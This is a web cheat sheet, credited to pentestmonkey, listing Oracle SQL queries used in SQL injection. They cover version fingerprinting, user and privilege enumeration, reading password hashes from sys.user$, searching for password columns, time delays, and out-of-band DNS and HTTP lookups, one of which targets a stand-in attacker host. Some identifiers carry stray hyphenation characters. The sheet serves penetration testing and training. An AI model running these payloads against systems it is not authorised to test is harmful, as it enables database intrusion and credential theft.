Show Menu
Cheatography

Oracle SQL Injection Cheat Sheet by

Source: pentestmonkey.net

Version

SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’;
SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’;
SELECT version FROM v$inst­ance;

Comments

SELECT 1 FROM dual — comment
– NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table.

Current User

SELECT user FROM dual

List Users

SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; — priv

List Password Hashes

SELECT name, password, astatus FROM sys.user$ — priv, <= 10g
SELECT name,s­pare4 FROM sys.user$ — priv, 11g

List Privileges

SELECT * FROM sessio­n_p­rivs; — current privs
SELECT * FROM dba_sy­s_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs
SELECT grantee FROM dba_sy­s_privs WHERE privilege = ‘SELECT ANY DICTIO­NARY’; — priv, find users with a particular priv
SELECT GRANTEE, GRANTE­D_ROLE FROM DBA_RO­LE_­PRIVS;

Location of DB files

SELECT name FROM V$DATA­FILE;

Avoiding Quotes

SELECT chr(65) || chr(66) FROM dual; — returns AB

Hostname, IP Address

SELECT UTL_IN­ADD­R.g­et_­hos­t_name FROM dual;
SELECT host_name FROM v$inst­ance;
SELECT UTL_IN­ADD­R.g­et_­hos­t_a­ddress FROM dual; — gets IP address
SELECT UTL_IN­ADD­R.g­et_­hos­t_n­ame­(’1­0.0.0.1′) FROM dual; — gets hostnames

Time Delay

BEGIN DBMS_L­OCK.SL­EEP(5); END; — priv, can’t seem to embed this in a SELECT
SELECT UTL_IN­ADD­R.g­et_­hos­t_n­ame­(’1­0.0.0.1′) FROM dual; — if reverse looks are slow
SELECT UTL_IN­ADD­R.g­et_­hos­t_a­ddr­ess­(‘b­lah.at­tac­ker.com’) FROM dual; — if forward lookups are slow
SELECT UTL_HT­TP.R­EQ­UES­T(‘­htt­p:/­/go­ogl­e.com’) FROM dual; — if outbound TCP is filtered / slow

Case Statement

SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1
SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2

Make DNS Requests

SELECT UTL_IN­ADD­R.g­et_­hos­t_a­ddr­ess­(‘g­oog­le.c­om’) FROM dual;
SELECT UTL_HT­TP.R­EQ­UES­T(‘­htt­p:/­/go­ogl­e.com’) FROM dual;

String Concat­enation

SELECT ‘A’ || ‘B’ FROM dual; — returns AB
 

Current Database

SELECT global­_name FROM global­_name;
SELECT name FROM v$data­base;
SELECT instan­ce_name FROM v$inst­ance;
SELECT SYS.DA­TAB­ASE­_NAME FROM DUAL;

List Databases

SELECT DISTINCT owner FROM all_ta­bles; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status).

List Columns

SELECT column­_name FROM all_ta­b_c­olumns WHERE table_name = ‘blah’;
SELECT column­_name FROM all_ta­b_c­olumns WHERE table_name = ‘blah’ and owner = ‘foo’;

Bitwise AND

SELECT bitand­(6,2) FROM dual; — returns 2
SELECT bitand­(6,1) FROM dual; — returns0

If Statement

BEGIN IF 1=1 THEN dbms_l­ock.sl­eep(3); ELSE dbms_l­ock.sl­eep(0); END IF; END; — doesn’t play well with SELECT statements

List DBA Accounts

SELECT DISTINCT grantee FROM dba_sy­s_privs WHERE ADMIN_­OPTION = ‘YES’; — priv, list DBAs, DBA roles

Select Nth Row

SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1)

List Tables

SELECT table_name FROM all_ta­bles;
SELECT owner, table_name FROM all_ta­bles;

Find Tables From Column Name

SELECT owner, table_name FROM all_ta­b_c­olumns WHERE column­_name LIKE ‘%PASS%’; — NB: table names are upper case

Select Nth Char

SELECT substr­(‘a­bcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’

ASCII Value -> Char

SELECT chr(65) FROM dual; — returns A

Casting

SELECT CAST(1 AS char) FROM dual;
SELECT CAST(’1′ AS int) FROM dual;

Char -> ASCII Value

SELECT ascii(‘A’) FROM dual; — returns 65
       
 

Comments

No comments yet. Add yours below!

Add a Comment

Your Comment

Please enter your name.

    Please enter your email address

      Please enter your Comment.

          Related Cheat Sheets

          Reverse Shell Cheat Sheet
          Network Recon Cheat Sheet

          More Cheat Sheets by Dormidera

          Reverse Shell Cheat Sheet